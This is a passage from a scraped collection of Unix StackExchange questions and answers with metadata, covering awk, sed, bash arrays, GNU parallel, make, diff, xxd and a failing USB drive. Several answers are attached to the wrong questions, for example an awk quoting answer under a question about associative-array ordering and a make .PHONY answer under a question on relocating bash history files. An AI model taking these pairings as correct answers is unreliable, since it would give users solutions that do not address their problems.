"${!filelist[@]}"; do which will list the keys of the array. The whole list could be processed with just one call to sha256sum: sha256sum "${filelist[@]}" | cut -c -64 The improved script is: filelist=() # declare filelist as an array and empty it.for file in ./*; do if [[ -f $file ]]; then filelist+=( "$file" ) fidonedeclare -r filelist # declare filelist as readonly.sha256sum "${filelist[@]}" | cut -c -64
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582041", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408027/" ] }
582,059
I'm working with sequence data and I stupidly cannot find the correct way to replace " . " by " X " in lines not starting with " > " using awk. I really need to use awk and not sed. I got this far, but simply all "." are replaced in this way: awk '/^>/ {next} {gsub(/\./,"X")}1' Sfr.pep > Sfr2.pep Example subdata: >sequence.1GTCAGTCAGTCA.GTCAGTCA Result I want to get: >sequence.1GTCAGTCAGTCAXGTCAGTCA
It seems more natural to do this with sed : sed '/^>/!y/./X/' Sfr.pep >Sfr2.pep This would match ^> against the current line ("does this line start with a > character?"). If that expression does not match, the y command is used to change each dot in that line to X . Testing: $ cat Sfr.pep>sequence.1GTCAGTCAGTCA.GTCAGTCA $ sed '/^>/!y/./X/' Sfr.pep >Sfr2.pep $ cat Sfr2.pep>sequence.1GTCAGTCAGTCAXGTCAGTCA The main issue with your awk code is that next is executed whenever you come across a fasta header line. This means that you code only produces sequence data, without headers. That sequence data should look ok though, but that would not be much help. Simply negating the test and dropping the next block (or preceding the next with print ) would solve it in awk for you, but, and this is my personal opinion, using the y command in sed is more elegant than using gsub() (or s///g in sed ) for transliterating single characters.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582059", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/403558/" ] }
582,092
I need to run several Bash scripts (the same script with different variables to be precise) at the same time. To keep the number of tabs under control, I wish to group them in a single terminal tab. The scripts regularly output, which I check for any problem. If I send them to the background as ./script.sh 1 &./script.sh 2 &./script.sh 3 &./script.sh 4 I will lose control over them. For example, I terminate the script by Ctrl + C . With the above code, I should find the pid for each process to kill them. Note that the above code is the content of my main script (say ./all_scripts.sh ) rather than commands to be typed in the terminal. Is there a way to run the script in the same terminal while treating them as a single outputting script?
After testing different methods and programs, I found that the pragmatic solution is GNU Parallel . I post this answer as it may help others. GNU Parallel has not been built for this task, but perfectly serves the purpose. If running the scripts as parallel -u ::: './script.sh 1' './script.sh 2' #(and so forth) All scripts will be run in parallel. The -u ( --ungroup ) flag sends the script outputs into stdout while executing the scripts. Ctrl + C kills the parallel job, and subsequently all running scripts.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582092", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/10780/" ] }
582,157
I'm interested in better implementation of "reverse sign" function in Bash. I know I can do something like: "$(($1 * -1))" But this produces a positive number w/o sign, but I need signed return value: "$((-1 * -1))" == 1 # but I need '+1' My current version is: # Reverts the +/- operators for an integer argument.## $ polarize -1 # +1# $ polarize +12 # -12# $ polarize 2-2 # 2-2# $ polarize - 1 # - 1#function polarize() { [ $# -eq 0 ] && return if [[ "$@" =~ ^-([[:digit:]]+)$ ]]; then echo -n "+${BASH_REMATCH[1]}" elif [[ "$@" =~ ^\+([[:digit:]]+)$ ]]; then echo -n "-${BASH_REMATCH[1]}" else echo -n "$@" fi} Some notes: Function should handle only signed integers (i.e. -1 , +22 , but not 0 or 100 ) Function shouldn't return anything if there is no argument Function should correct handle multiple arguments (don't do anything)
Use printf : printf '%+d\n' "$(( -$n ))" The printf format string %+d means "print the given argument as a decimal integer, with a sign". So you'll get something like revsign () { if [ "$#" -eq 1 ] && [[ $1 =~ ^[+-][[:digit:]]+$ ]]; then printf '%+d\n' "$(( -$1 ))" fi} This does not do anything when given multiple arguments or when given a single argument that is not a signed integer. To pass through the arguments when there are multiple of them or when the single argument isn't an integer with a sign: revsign () { if [ "$#" -eq 1 ] && [[ $1 =~ ^[+-][[:digit:]]+$ ]]; then printf '%+d\n' "$(( -$1 ))" elif [ "$#" -gt 0 ]; then printf '%s\n' "$@" fi} If you want to be careful and not accept octal numbers (written with a leading 0 , as in 034 ) as valid integers, change the regular expression to ^[+-][1-9][[:digit:]]*$
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582157", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/50400/" ] }
582,288
I was looking for a way to follow "hyperlinks" in man pages, when I stumbled across the info command, which seemed to display information on commands the same as man but also allows you to tab to hyperlinks (and sadly no vim keybindings, but the arrow keys work) But it made me wonder if this command was just displaying man pages with different formatting and functionality of display...or if it was displaying something else entirely like a separate set of documentation.
man and info use different primary sources of information: man displays manpages, typically stored in /usr/share/man , while info displays Info documents, typically stored in /usr/share/info . Additionally, Info documents are normally available in a tree structure, rooted in /usr/share/info/dir , the “Directory node” displayed when you start info . Whether a given manpage contains the same information as its corresponding Info document depends on who authored both. In some cases, they’re produced from a common source, or one is produced from the other; but in many cases they’re different. GNU info will display a manpage if it doesn’t find an Info document. Pinfo can also display both Info documents and manpages, and it provides hyperlinks in manpages; its key bindings can also be configured to match your tastes.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582288", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/3570/" ] }
582,344
From inside an AWK script, I can pass variables as arguments to external utilities: awk 'BEGIN { filename = "path_to_file_without_space" "file " filename | getline print $0}' But if the variable contains spaces, awk 'BEGIN { filename = "path to file with spaces" "file " filename | getline print $0}' I get the error file: cannot open `path' (No such file or directory) Suggesting that the argument is split on whitespace, much the same way that a shell splits unquoted variables on whitespace. I thought of disabling shell field splitting by setting the shell's IFS to null, like so "IFS= file " filename | getline Or by setting IFS to null before running the AWK command, but neither option makes any difference. How can I avoid this field splitting?
You will have to quote the name of the file: awk 'BEGIN { filename = "path to file with spaces" "file \"" filename "\"" | getline print}' or, as suggested in comments, for ease of reading, awk 'BEGIN { DQ = "\042" # double quote (ASCII octal 42) filename = "path to file with spaces" "file " DQ filename DQ | getline print}' or, assuming this is part of a larger awk program, BEGIN { SQ = "\047" DQ = "\042"}BEGIN { name = "filename with spaces" cmd = sprintf("file %s%s%s", DQ, name, DQ) cmd | getline close(cmd) print} That is, close the command when done with it to save on open file handles. Set up convenience "constants" in a separate BEGIN block (these blocks are executed in order). Create the command using sprintf into a separate variable. (Most of these things are obviously for longer or more complicated awk programs that needs to present a readable structure to be maintainable; one could also imagine writing a dquote() and squote() function that quotes strings) The left hand side of the "pipe" will evaluate to the literal string file "path to file with spaces" Basically, using cmd | getline makes awk call sh -c with a single argument, which is the string cmd . That string therefore must be properly quoted for executing with sh -c . The technical details are found in POSIX standard : expression | getline [var] Read a record of input from a stream piped from the output of a command. The stream shall be created if no stream is currently open with the value of expression as its command name. The stream created shall be equivalent to one created by a call to the popen() function with the value of expression as the command argument and a value of r as the mode argument. As long as the stream remains open, subsequent calls in which expression evaluates to the same string value shall read subsequent records from the stream. The stream shall remain open until the close function is called with an expression that evaluates to the same string value. At that time, the stream shall be closed as if by a call to the pclose() function. If var is omitted, $0 and NF shall be set; otherwise, var shall be set and, if appropriate, it shall be considered a numeric string (see Expressions in awk). The popen() function referred to here is the C popen() library function. This arranges for he given string to be executed by sh -c . You'll have exactly the same issue with system() if executing a command using a filename with spaces, but in that case the C library's system() function is called, which also calls sh -c in a similar way as popen() (but with different plumbing of I/O streams). So, no amount of setting IFS to anything would help if sh -c was invoked with the single argument file path to file with spaces
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582344", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/-1/" ] }
582,347
I have below script, i noticed that the for-loop in this case is executing in order other than i specified ie. expected 2018,2019,2020 but comes out as 2019,2018,2020. Is there a specific reason for that in shell scripting, is there any way to preserve the order. #!/bin/shdeclare -A arrarr=( ["2018"]=5%12 ["2019"]=1%12 ["2020"]=1%2 )INPUT_MONTH=$2INPUT_YEAR=$1#For loop to iterate the year(key) value of arrayfor year in ${!arr[@]}; do echo ${year} ${arr[${year}]} MONTH_RANGE=${arr[${year}]} if [ ${year} -ge ${INPUT_YEAR} ]; then START_MONTH=$(echo "${MONTH_RANGE}" | cut -d'%' -f 1) END_MONTH=$(echo "${MONTH_RANGE}" | cut -d'%' -f 2) # input year is equal and input month is different from default start one. if [ "${year}" == "${INPUT_YEAR}" ]; then START_MONTH=$INPUT_MONTH fi for mon in $(seq $START_MONTH $END_MONTH); do echo "Process year:month <=> ${year}:${mon}" done; else continue; fidone; output: 2019 1%12Process year:month <=> 2019:1Process year:month <=> 2019:2Process year:month <=> 2019:3Process year:month <=> 2019:4Process year:month <=> 2019:5Process year:month <=> 2019:6Process year:month <=> 2019:7Process year:month <=> 2019:8Process year:month <=> 2019:9Process year:month <=> 2019:10Process year:month <=> 2019:11Process year:month <=> 2019:122018 5%12Process year:month <=> 2018:4Process year:month <=> 2018:5Process year:month <=> 2018:6Process year:month <=> 2018:7Process year:month <=> 2018:8Process year:month <=> 2018:9Process year:month <=> 2018:10Process year:month <=> 2018:11Process year:month <=> 2018:122020 1%2Process year:month <=> 2020:1Process year:month <=> 2020:2
You will have to quote the name of the file: awk 'BEGIN { filename = "path to file with spaces" "file \"" filename "\"" | getline print}' or, as suggested in comments, for ease of reading, awk 'BEGIN { DQ = "\042" # double quote (ASCII octal 42) filename = "path to file with spaces" "file " DQ filename DQ | getline print}' or, assuming this is part of a larger awk program, BEGIN { SQ = "\047" DQ = "\042"}BEGIN { name = "filename with spaces" cmd = sprintf("file %s%s%s", DQ, name, DQ) cmd | getline close(cmd) print} That is, close the command when done with it to save on open file handles. Set up convenience "constants" in a separate BEGIN block (these blocks are executed in order). Create the command using sprintf into a separate variable. (Most of these things are obviously for longer or more complicated awk programs that needs to present a readable structure to be maintainable; one could also imagine writing a dquote() and squote() function that quotes strings) The left hand side of the "pipe" will evaluate to the literal string file "path to file with spaces" Basically, using cmd | getline makes awk call sh -c with a single argument, which is the string cmd . That string therefore must be properly quoted for executing with sh -c . The technical details are found in POSIX standard : expression | getline [var] Read a record of input from a stream piped from the output of a command. The stream shall be created if no stream is currently open with the value of expression as its command name. The stream created shall be equivalent to one created by a call to the popen() function with the value of expression as the command argument and a value of r as the mode argument. As long as the stream remains open, subsequent calls in which expression evaluates to the same string value shall read subsequent records from the stream. The stream shall remain open until the close function is called with an expression that evaluates to the same string value. At that time, the stream shall be closed as if by a call to the pclose() function. If var is omitted, $0 and NF shall be set; otherwise, var shall be set and, if appropriate, it shall be considered a numeric string (see Expressions in awk). The popen() function referred to here is the C popen() library function. This arranges for he given string to be executed by sh -c . You'll have exactly the same issue with system() if executing a command using a filename with spaces, but in that case the C library's system() function is called, which also calls sh -c in a similar way as popen() (but with different plumbing of I/O streams). So, no amount of setting IFS to anything would help if sh -c was invoked with the single argument file path to file with spaces
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582347", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/336214/" ] }
582,437
In my make file I have a target test: and make test works fine.But when I also have a subdir called test , I get the message: make: 'test' is up to date. How can I force make to ignore the subdir and do the target?
Declare it as phony . This is supported by GNU make and BSD make. .PHONY: testtest: build test/run_them_all
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582437", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/378139/" ] }
582,463
How do you relocate bash runtime files ( ~/.bash_history , ~/.bashrc , etc.) to a defined directory (such as ~/.config/bash , ~/.cache/bashhistory , etc.)?
Declare it as phony . This is supported by GNU make and BSD make. .PHONY: testtest: build test/run_them_all
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582463", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408670/" ] }
582,567
I need to write a shell script which can execute all .sh files if they exist in a directory pattern. Something like: ##!/bin/bashsh /var/scripts/*/my_*.inc.sh But the above script executes only just one file; the first file which happens (seems chosen by the latest modification date) which is not my point. I need all files matching the rule to be executed.
The reason that your code does not work is because of what happens when a filename globbing pattern expands. The pattern would expand to a list of matching pathnames. The code in your script would call sh with this list. This means it would execute the first matching name as the script and give the other names as arguments to that script: sh /var/scripts/dir/my_first.inc.sh /var/scripts/dir/my_second.inc.sh /var/scripts/dir/my_third.inc.sh Instead, just iterate over the matching names: #!/bin/shfor name in /var/scripts/*/my_*.inc.sh; do sh "$name"done This assumes that each of the matching names is a script that should be executed by sh (not bash ). If the individual files are executable and has a proper #! -line, then remove the sh from the invocation of the script in the loop above. If the files are "dot scripts", i.e. script that should be sourced, then replace sh by . instead to have the script execute in the current script's environment. Note that the script above can be an sh script ( #!/bin/sh ) as it does not use any bash features. If the other script are "dot scripts", then you may obviously have to change this to #!/bin/bash or whatever other interpreter is needed to source the scripts.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582567", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/223233/" ] }
582,606
Every now and then I need to reinstall Linux system (mainly Ubuntu based distros). The process of reinstalling every piece of software I need is really boring and time consuming. Is there any software that can help me out? For Windows there is Ninite, is there something else for Linux? Edit: Thanks for all the answers! I went with Ansible and it is an amazing tool.
Ansible is an open-source software provisioning, configuration management, and application-deployment tool. It runs on many Unix-like systems, and can configure both Unix-like systems as well as Microsoft Windows. It includes its own declarative language to describe system configuration (From Wikipedia .) Homepage (Github) . There are several others in the same category. Reading about ansible should give you vocabulary to search for the others, and compare, if needed. Nix is a newer contender. Some say "more complex, but maybe just right.". chef is also on the scene. Ansible example for hostname myhost , module apt (replace with yum or whatever): ansible -K -i myhost, -m apt -a "name=tcpdump,tmux state=present" --become myhost The list "tcpdump,tmux" can be extended with commas. (The fact, that the hostname myhost is twice in the command-line, because we are not using a fixed host inventory list, but an ad-hoc one, with the trailing comma.) This only scratches the surface, Ansible has an extensive module collection .
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582606", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408815/" ] }
582,693
How do I get the first digit from a number? For example, 25 - to get only the "2" from the 25. This is what I tried: echo -n "Enter age: " read age echo $(s:0:1)
You're using the wrong variable s instead of age and parameter expansion works with curly braces ${...} : read -p "Enter age: " ageecho "${age:0:1}"
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582693", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408468/" ] }
582,701
I looked at other similar questions but the answers did not help me. I am new to bash and probably have a syntax error in my script but I can't figure out where. I was trying to update users in the example.conf file every time this script is run. Each user has a name.pub file. VAR1=$( ls | grep ".pub" |sed "s/.pub//g")VAR2="@demo_project_users = "res=$VAR2$VAR1sed "s/@demo_project_users = .*/$res/g" example.conf This is producing the Unterminated 's' command error. Edit: I have these files in a folder aaaaaaaaaa.pub eboh.pub get_usernames.sh mmusterfrau.pub plom.pub rrein.pub update_users.shdboh.pub example.conf leni.pub mmustermann.pub rcall.pub tani.pub and I want to get all user names (without .pub) in one row with a space inbetween, like this @demo_project_users = (... all names here)
Your grep is likely matching more than one filename, which gives a value in $res that contains newlines. GNU sed would complain exactly the way that you describe when using a replacement string that contains literal newlines. Don't use grep to filter the output of ls . If you want to get all names in he current directory matching the pattern *.pub , use filenames=( *.pub ) This would create an array containing all names that matches the given pattern. Then: sed 's/\(@demo_project_users = \).*/\1'"${filenames[*]%.pub}"'/g' example.conf The "${filenames[*]%.pub}" expansion will expand to a single string consisting of each of the filenames in the filenames array, delimited by spaces (or whatever the first character of $IFS happens to be; a space by default), and with the suffix string .pub removed from each one. It's the "${filenames[*]}" bit that expands to the space-delimited string, and its the %.pub bit that removes the .pub suffix from each filename.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582701", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/408908/" ] }
582,738
I'm attempting to start with a file in the following form: 00: 42 ; byte 0 is 0x42 / d01: 52 ; byte 1 is 0x52 / r02: 62 ; byte 2 is 0x62 / D03: 72 ; byte 3 is 0x72 / R07: 1f ; bytes 03..0e are implicitly 00, byte 0f is 0x1f and use it to generate an 8-byte file whose values (in hex form) would be: 42 52 62 72 00 00 00 1f The exact input format isn't carved in stone. I just picked ';' as a comment delimiter because it's a single character and unambiguous. The form of the offset: and 2-digit hex value just seemed obvious based on tradition. I suspect the ultimate solution involves using sed or awk to strip away the comment, then piping their output to xxd , but so far my first experiment has fallen flat on its face & I can't even get xxd to parse what ought to be a best-case simple text file. For my first attempt, I simplified config.src: 00: 4201: 5202: 6203: 72 (omitting the comments and implied zero-bytes for now, and sticking to values corresponding to printable ASCII) ... then tried to generate the binary file from it: xxd -r config.src config.bin What I expected to see from cat config.bin and xxd config.bin : BRbr and 00000000: 42 52 62 72 BRbr What I ended up with: a 2-byte file with unprintable content cat can't render, and the following output from xxd config.bin : 00000000: 0301 So... problem #1... What am I doing wrong with xxd , and how can I fix it (or is there a better approach)? Keep in mind that I really want to specify one byte value per line, and would really like to be able to automatically skip sequential values and have them automatically filled with zeroes. The... problem #2... once I get xxd to parse my file, how can I go add the comments and strip them away before xxd sees them? Note that I'm not hellbent on using xxd per se... but this is a shared web server to which I don't have root or admin access, so apt-get install isn't an option, and compiling my own copies from source wouldn't necessarily be easy). (Background info... not necessary essential to solving the problem, but adding context to why I'm trying to do it) I'm working on an Arduino-based IoT controller. For the past few weeks, its configuration has consisted of hardcoded values and various interpretations of a DIP switch I've repurposed every few days. It's getting tedious. I'm not in the mood yet to implement a proper UI, so I came up with the idea of having it just fetch a binary config blob from my web server into a char[] as its first act upon starting up (enabling me to tweak runtime config values without having to go all the way and reflash the board itself, which is honestly kind of a pain at this point).
Your grep is likely matching more than one filename, which gives a value in $res that contains newlines. GNU sed would complain exactly the way that you describe when using a replacement string that contains literal newlines. Don't use grep to filter the output of ls . If you want to get all names in he current directory matching the pattern *.pub , use filenames=( *.pub ) This would create an array containing all names that matches the given pattern. Then: sed 's/\(@demo_project_users = \).*/\1'"${filenames[*]%.pub}"'/g' example.conf The "${filenames[*]%.pub}" expansion will expand to a single string consisting of each of the filenames in the filenames array, delimited by spaces (or whatever the first character of $IFS happens to be; a space by default), and with the suffix string .pub removed from each one. It's the "${filenames[*]}" bit that expands to the space-delimited string, and its the %.pub bit that removes the .pub suffix from each filename.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/582738", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/37564/" ] }
582,772
I wanted to print the fields in the line which is delimited by |~^ . I tried many ways, but am unable to print the fields using awk . Below is the file content for reference. Input H|~^20200425|~^abcd|~^sumR|~^abc|~^2019-03-05|~^10.00R|~^abc|~^2019-03-05|~^20.00R|~^abc|~^2019-03-05|~^30.00R|~^abc|~^2019-03-06|~^100.00R|~^abc|~^2019-03-06|~^15.00R|~^abc|~^2019-03-06|~^10.00T|~^20200425|~^6|~^185.00 I need to separate the fields based on |~^ delimiter using awk . I tried cat input |grep "^T"|awk -F '|~^' '{print $2}' but it's returning null. Any suggestions?
I think the problem you are facing is related to the following statement in the (GNU) awk manpage [1]: If FS is a single character, fields are separated by that character. If FS is the null string, then each individual character becomes a separate field. Otherwise, FS is expected to be a full regular expression . Since your field delimiting pattern contains characters that have a special meaning in regular expressions (the | and the ^ ), you need to escape them properly. Because of the way awk interprets variables (string literals are parsed twice ), you would need to specify that using double backslashes , as in awk -F '\\|~\\^' '{print $2}' input.txt Resulting output for your example: 20200425abcabcabcabcabcabc20200425 To consider only those lines starting with T , use awk -F '\\|~\\^' '/^T/ {print $2}' input.txt or alternatively, by selecting only lines where a certain field (here, the first field) has a value of T : awk -F '\\|~\\^' '$1=="T" {print $2}' input.txt Result for your example in both cases 20200425 Notice that in general, the combined use of awk , grep and sed is rarely necessary. Furthermore, all these tools can directly access files, so using cat to feed them the text to process is also unnecessary. [1]: As an (unrelated) side note: The part with the "null string" does not work on all Awk variants. The GNU Awk manual states "This is a common extension; it is not specified by the POSIX standard".
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582772", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/400540/" ] }
582,774
I have a representative dataset 35.5259 327 35.526 326 35.526 325 35.5261 324 35.5262 323 35.5263 322 35.5264 321 35.5265 320 35.5266 319 35.5268 318# Contour 4, label: 35.5269 317 35.527 316 35.5272 315 35.5274 314 35.5276 313 35.5278 312 35.528 311 # Contour 4, label: 35.5282 310 35.5285 309 35.5287 308 35.529 307 35.5293 306 I try to find the two max values within a range in col 2 with: awk '320>$2,$2>315 && $1>max1{max1=$1;line=$2} 313>$2,$2>307 && $1>max2{max2=$1;line2=$2} END {printf " %s\t %s\t %s\t %s\n",max1,line,max2,line2}' FILENAME I just get blank ouput (As I have lots of blank spaces in the txt file)How to ignore that ? with $1+0 == $1 ? I would like to find the Max values in col1 between 320 and 315 and between 313-307 in col2. The output I need: 35.5266 319 35.5278 312 How do I get the desired output ?Thanks
I think the problem you are facing is related to the following statement in the (GNU) awk manpage [1]: If FS is a single character, fields are separated by that character. If FS is the null string, then each individual character becomes a separate field. Otherwise, FS is expected to be a full regular expression . Since your field delimiting pattern contains characters that have a special meaning in regular expressions (the | and the ^ ), you need to escape them properly. Because of the way awk interprets variables (string literals are parsed twice ), you would need to specify that using double backslashes , as in awk -F '\\|~\\^' '{print $2}' input.txt Resulting output for your example: 20200425abcabcabcabcabcabc20200425 To consider only those lines starting with T , use awk -F '\\|~\\^' '/^T/ {print $2}' input.txt or alternatively, by selecting only lines where a certain field (here, the first field) has a value of T : awk -F '\\|~\\^' '$1=="T" {print $2}' input.txt Result for your example in both cases 20200425 Notice that in general, the combined use of awk , grep and sed is rarely necessary. Furthermore, all these tools can directly access files, so using cat to feed them the text to process is also unnecessary. [1]: As an (unrelated) side note: The part with the "null string" does not work on all Awk variants. The GNU Awk manual states "This is a common extension; it is not specified by the POSIX standard".
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582774", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/293538/" ] }
582,796
According to https://www.computerhope.com/unix/udiff.htm The diff command analyzes two files and prints the lines that aredifferent. Can I use the same diff command to compare two strings? $ more file*::::::::::::::file1.txt::::::::::::::hey::::::::::::::file2.txt::::::::::::::hi $ diff file1.txt file2.txt 1c1< hey---> hi Instead of saving the content of hey and hi into two different files, can I read it directly? By the way, there are no files named hey or hi in the example below, which is why I get No such file or directory error messages. $ diff hey hidiff: hey: No such file or directorydiff: hi: No such file or directory
Yes, you can use diff on two strings, if you make files from them, because diff will only ever compare files. A shortcut way to do that is using process substitutions in a shell that supports these: diff <( printf '%s\n' "$string1" ) <( printf '%s\n' "$string2" ) Example: $ diff <( printf '%s\n' "hey" ) <( printf '%s\n' "hi" )1c1< hey---> hi In other shells, printf '%s\n' "$string1" >tmpfileprintf '%s\n' "$string2" | diff tmpfile -rm -f tmpfile In this second example, one file contains the first string, while the second string is given to diff on standard input. diff is invoked with the file containing the first string as its first argument. As its second argument, - signals that it should read standard input (on which the second string will arrive via printf ).
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582796", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/409008/" ] }
582,844
I'm trying to execute following code: set -euxo pipefailyes phrase | make installer Where Makefile uses phrase from stdin to create installer file. However, this commands ends in error code 141, which breaks my CI build.This example can be simplified to: yes | tee >(echo yo) From what is see here: Pipe Fail (141) when piping output into tee -- why? - this error means that pipe consumer just stopped consuming output - which is perfectly fine in my case. Is there a way to suppress pipe error, and just get the return code from make installer ?
A 141 exit code indicates that the process failed with SIGPIPE ; this happens to yes when the pipe closes. To mask this for your CI, you need to mask the error using something like (yes phrase ||:) | make installer This will run yes phrase , and if it fails, run : which exits with code 0. This is safe enough since yes doesn’t have much cause to fail apart from being unable to write. To debug pipe issues such as these, the best approach is to look at PIPESTATUS : yes phrase | make installer || echo "${PIPESTATUS[@]}" This will show the exit codes for all parts of the pipe on failure. Those which fail with exit code 141 can then be handled appropriately. The generic handling pattern for a specific error code is (command; ec=$?; if [ "$ec" -eq 141 ]; then exit 0; else exit "$ec"; fi) (thanks Hauke Laging ); this runs command , and exits with code 0 if command succeeds or if it exits with code 141. Other exit codes are reflected as-is.
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/582844", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/184021/" ] }
582,949
A relative asked me to look at a Seagate 2TB external hard drive of theirs that they said used to work and no longer does. I popped it into my desktop and nothing happened for a while other than it showing up (with an appropriate name) in lsusb . After about 10 minutes I used ls \dev | grep sd and saw that it finally came up as /dev/sdc, so I tried to view it in fdisk -l , but it was not listed. I figured maybe it was a GPT table so I opened it in GParted, but it was taking forever to load so I tried lsblk where I got this: NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTsda 8:0 0 111.8G 0 disk ├─sda1 8:1 0 108G 0 part /├─sda2 8:2 0 1K 0 part └─sda5 8:5 0 3.8G 0 part [SWAP]sdb 8:16 0 1.8T 0 disk └─sdb1 8:17 0 1.8T 0 part sdc 8:32 0 128P 0 disk sr0 11:0 1 1024M 0 rom Now either my relative is somehow in possession of the largest drive known to man, or something VERY strange has occurred. Assuming the latter, is there any way I could go about fixing this issue? A little extra note: I tried opening the drive with GParted again, this time waiting for it to load, and it too believed the drive to contain 128 PB of unallocated space, so this is something internal. Also, clearly there are no partitions detected, and I already told my relative there is likely nothing that can be done about the data on it, which they said they didn't care about anyway, they just want the drive to be usable again. I tried rewriting the MBR using dd which failed, and so I got the following relevant messages from dmesg : [15404.910434] scsi_io_completion_action: 14 callbacks suppressed[15404.910445] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.910449] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.910453] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.910457] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00[15404.910458] print_req_error: 14 callbacks suppressed[15404.910461] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0[15404.914427] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.914430] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.914432] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.914435] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00[15404.914437] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0[15404.914440] buffer_io_error: 38 callbacks suppressed[15404.914442] Buffer I/O error on dev sdc, logical block 0, async page read[15404.915937] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.915941] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.915944] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.915949] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 02 00 00 00 06 00 00[15404.915953] blk_update_request: critical medium error, dev sdc, sector 2 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0[15404.915959] Buffer I/O error on dev sdc, logical block 1, async page read[15404.915963] Buffer I/O error on dev sdc, logical block 2, async page read[15404.915966] Buffer I/O error on dev sdc, logical block 3, async page read[15404.917683] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.917686] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.917689] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.917692] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00[15404.917694] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0[15404.917698] Buffer I/O error on dev sdc, logical block 0, async page read[15404.919186] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.919189] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.919192] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.919195] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 02 00 00 00 06 00 00[15404.919197] blk_update_request: critical medium error, dev sdc, sector 2 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0[15404.919200] Buffer I/O error on dev sdc, logical block 1, async page read[15404.919203] Buffer I/O error on dev sdc, logical block 2, async page read[15404.919205] Buffer I/O error on dev sdc, logical block 3, async page read[15404.920932] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.920935] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.920937] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.920940] sd 10:0:0:0: [sdc] tag#0 CDB: Read(16) 88 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00[15404.920942] blk_update_request: critical medium error, dev sdc, sector 0 op 0x0:(READ) flags 0x0 phys_seg 1 prio class 0[15404.920945] Buffer I/O error on dev sdc, logical block 0, async page read[15404.922433] sd 10:0:0:0: [sdc] tag#0 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE cmd_age=0s[15404.922436] sd 10:0:0:0: [sdc] tag#0 Sense Key : Medium Error [current] [15404.922438] sd 10:0:0:0: [sdc] tag#0 Add. Sense: Unrecovered read error[15404.922440] sd 